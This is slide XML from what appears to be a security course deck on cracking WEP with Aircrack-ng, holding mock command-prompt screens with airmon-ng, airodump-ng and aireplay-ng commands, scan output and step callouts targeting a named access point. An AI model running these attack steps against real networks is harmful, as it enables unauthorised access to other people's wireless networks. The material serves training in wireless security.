        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rectangle 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="323062" y="767572"/>
              <a:ext cx="7184722" cy="2569934"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:effectLst>
              <a:innerShdw blurRad="114300">
                <a:prstClr val="black"/>
              </a:innerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" marR="0">
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pP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C:\&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="14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airmon-ng start eth1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" marR="0">
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pP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C:\&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFC000"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>airodump-ng  --ivs --write capture eth1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" marR="0">
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pP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BSSID                          PWR    RXQ     Beacons    #Data,   #/s    CH    MB    ENC    CIPHER    AUTH    ESSID</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" marR="0">
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pP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02:24:2B:CD:68:EF     99         5            60                3         0       1     54e    OPN               	           IAMROGER</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" marR="0">
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pP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02:24:2B:CD:68:EE     99         9            75                2         0       5     54e    OPN               	           COMPANYZONE</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" marR="0">
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pP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00:14:6C:95:6C:FC     99         0            15                 0         0       9     54e    WEP     WEP                     HOME</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
              </a:pP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1E:64:51:3B:FF:3E</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="105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  </a:t>
              </a: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   76       70          157     	        1         0     11     54e    WEP     WEP                     SECRET_SSID</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" marR="0">
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="0" marR="0">
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pP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BSSID                          Station                         PWR      Rate      Lost     Packets    Probes</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>1E:64:51:3B:FF:3E</a:t>
              </a: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    00:17:9A:C3:CF:C2       -1         1 - 0          0               1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>1E:64:51:3B:FF:3E</a:t>
              </a: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    00:1F:5B:BA:A7:CD     76         1e-54       0               6</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rectangle 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="250117" y="359484"/>
              <a:ext cx="7370064" cy="370635"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="BFBFBF"/>
            </a:solidFill>
            <a:ln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none" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="736749" y="376877"/>
              <a:ext cx="1744261" cy="33855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600" b="1" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Command Prompt</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="Picture 3" descr="E:\Web2.0 PNG Icons\Windows Command.pn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3860" y="367352"/>
              <a:ext cx="398185" cy="3497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4" descr="X:\Web2.0 PNG Icons\wifi\Scroll-bar vertical.png"/>
            <p:cNvPicPr preferRelativeResize="0"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72545" y="727423"/>
              <a:ext cx="210312" cy="257860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3" descr="X:\Maqbool\Icons\x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39823" y="421944"/>
              <a:ext cx="228600" cy="2286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15" name="Straight Arrow Connector 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2351828" y="1630957"/>
            <a:ext cx="5766364" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/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Group 32"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="353875" y="4287616"/>
            <a:ext cx="7593385" cy="2141871"/>
            <a:chOff x="1569372" y="4235566"/>
            <a:chExt cx="7370064" cy="2099667"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="16" name="Group 15"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1569372" y="4235566"/>
              <a:ext cx="7370064" cy="2099667"/>
              <a:chOff x="228600" y="3261765"/>
              <a:chExt cx="7370064" cy="2099667"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="17" name="Rectangle 16"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="228600" y="3276600"/>
                <a:ext cx="7370064" cy="208483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ffectLst>
                <a:innerShdw blurRad="114300">
                  <a:prstClr val="black"/>
                </a:innerShdw>
              </a:effectLst>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" rtlCol="0" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="18" name="Rectangle 17"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="261509" y="3299220"/>
                <a:ext cx="7292998" cy="2017238"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ln w="76200">
                <a:noFill/>
              </a:ln>
              <a:effectLst>
                <a:innerShdw blurRad="114300">
                  <a:prstClr val="black"/>
                </a:innerShdw>
              </a:effectLst>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none"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9" name="Rectangle 18"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="301545" y="3669853"/>
                <a:ext cx="7184722" cy="1646605"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:effectLst>
                <a:innerShdw blurRad="114300">
                  <a:prstClr val="black"/>
                </a:innerShdw>
              </a:effectLst>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" anchor="ctr">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:spcBef>
                    <a:spcPts val="300"/>
                  </a:spcBef>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="+mj-lt"/>
                    <a:ea typeface="Calibri"/>
                    <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>C:\&gt;</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="pt-BR" sz="1400" b="1" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FFC000"/>
                    </a:solidFill>
                    <a:latin typeface="+mj-lt"/>
                    <a:ea typeface="Calibri"/>
                    <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>aireplay-ng -1 0 -e SECRET_SSID -a 1e:64:51:3b:ff:3e -h a7:71:fe:8e:d8:25 eth1 </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcBef>
                    <a:spcPts val="300"/>
                  </a:spcBef>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="+mj-lt"/>
                    <a:ea typeface="Calibri"/>
                    <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>22:25:10  Waiting for beacon frame (BSSID: 1E:64:51:3B:FF:3E) on channel 11</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcBef>
                    <a:spcPts val="300"/>
                  </a:spcBef>
                </a:pPr>
                <a:endPara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endParaRPr>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcBef>
                    <a:spcPts val="300"/>
                  </a:spcBef>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="+mj-lt"/>
                    <a:ea typeface="Calibri"/>
                    <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>22:25:10 Sending Authentication Request </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcBef>
                    <a:spcPts val="300"/>
                  </a:spcBef>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="+mj-lt"/>
                    <a:ea typeface="Calibri"/>
                    <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>22:25:10 Authentication successful </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcBef>
                    <a:spcPts val="300"/>
                  </a:spcBef>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="+mj-lt"/>
                    <a:ea typeface="Calibri"/>
                    <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>22:25:10 Sending Association Request </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcBef>
                    <a:spcPts val="300"/>
                  </a:spcBef>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="+mj-lt"/>
                    <a:ea typeface="Calibri"/>
                    <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>22:25:10 Association successful :-)</a:t>
                </a:r>
                <a:endParaRPr lang="pt-BR" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFC000"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="20" name="Rectangle 19"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="228600" y="3261765"/>
                <a:ext cx="7370064" cy="370635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ffectLst>
                <a:innerShdw blurRad="114300">
                  <a:prstClr val="black"/>
                </a:innerShdw>
              </a:effectLst>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" rtlCol="0" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="21" name="Rectangle 20"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="715232" y="3279158"/>
                <a:ext cx="1744261" cy="33855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en-US" sz="1600" b="1" dirty="0">
                    <a:latin typeface="+mj-lt"/>
                  </a:rPr>
                  <a:t>Command Prompt</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="22" name="Picture 3" descr="E:\Web2.0 PNG Icons\Windows Command.png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2343" y="3269633"/>
                <a:ext cx="398185" cy="34978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3" name="Picture 3" descr="X:\Maqbool\Icons\x.png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18306" y="3324225"/>
                <a:ext cx="228600" cy="22860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26" name="Rounded Rectangle 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3330319" y="4655242"/>
              <a:ext cx="976258" cy="280959"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Rounded Rectangle 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4476157" y="4655242"/>
              <a:ext cx="1269136" cy="280959"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"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Rectangle 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4769772" y="5316719"/>
              <a:ext cx="1055482" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:effectLst>
              <a:innerShdw blurRad="114300">
                <a:prstClr val="black"/>
              </a:innerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Target SSID </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Rectangle 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6141372" y="5311900"/>
              <a:ext cx="1658916" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:effectLst>
              <a:innerShdw blurRad="114300">
                <a:prstClr val="black"/>
              </a:innerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Target MAC address</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="30" name="Straight Arrow Connector 29"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="4319348" y="4938835"/>
              <a:ext cx="663008" cy="380519"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="FFC00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Arrow Connector 30"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="5795463" y="4928897"/>
              <a:ext cx="663008" cy="380519"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/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2" name="Elbow Connector 31"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3861799" y="1877682"/>
            <a:ext cx="4223737" cy="1070467"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 13030"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/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Rectangle 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE2835E1-01C4-4F0A-AFD8-FE7542511E5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8958406" y="1346250"/>
            <a:ext cx="2669714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US" sz="1400" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Run airmon-ng in monitor mode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1D1069AE-CC8E-482A-9D67-784A6D5AED64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8958406" y="2502855"/>
            <a:ext cx="2764185" cy="116955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US" sz="1400" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Start airodump to discover SSIDs on interface and keep it running; your capture file should contain more than 50,000 IVs to successfully crack the WEP key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5548A763-369B-4348-AC68-415F67EDD904}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8958406" y="4514422"/>
            <a:ext cx="2888817" cy="523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US" sz="1400" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Associate your wireless card with the target AP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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9354BFD7-5B31-4E5C-A58B-EBE87B8009E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6593987" y="4852721"/>
            <a:ext cx="1491548" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/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E539763A-1F5B-4857-9324-156D4369D403}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8135998" y="3117899"/>
            <a:ext cx="740933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r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Step 2</a:t>
            </a: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C0D2B0B5-397F-49D7-98D4-8061BCDFEED3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8135998" y="1504482"/>
            <a:ext cx="740933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r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Step 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="181378403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5B5145B-0B91-4E9C-A27C-9346A8A933C5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141413" y="158750"/>
            <a:ext cx="9909175" cy="585788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US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Cracking WEP Using Aircrack-ng (Cont’d)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3600" b="1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</a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="26" name="Group 25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="483510" y="1027550"/>
            <a:ext cx="7518203" cy="2294494"/>
            <a:chOff x="1589181" y="1138328"/>
            <a:chExt cx="7370064" cy="2044803"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Rectangle 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1589181" y="1153163"/>
              <a:ext cx="7370064" cy="2029968"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="BFBFBF"/>
            </a:solidFill>
            <a:ln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none" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Rectangle 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1632723" y="1175783"/>
              <a:ext cx="7278624" cy="1957385"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:ln w="76200"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none" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rectangle 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1662126" y="1623869"/>
              <a:ext cx="7184722" cy="1268563"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:effectLst>
              <a:innerShdw blurRad="114300">
                <a:prstClr val="black"/>
              </a:innerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
              </a:pP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C:\&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="pt-BR" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFC000"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>aireplay-ng -3 -b 1e:64:51:3b:ff:3e -h a7:71:fe:8e:d8:25 eth1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcBef>
                  <a:spcPts val="300"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>22:30:15  Waiting for beacon frame (BSSID: 1E:64:51:3B:FF:3E) </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
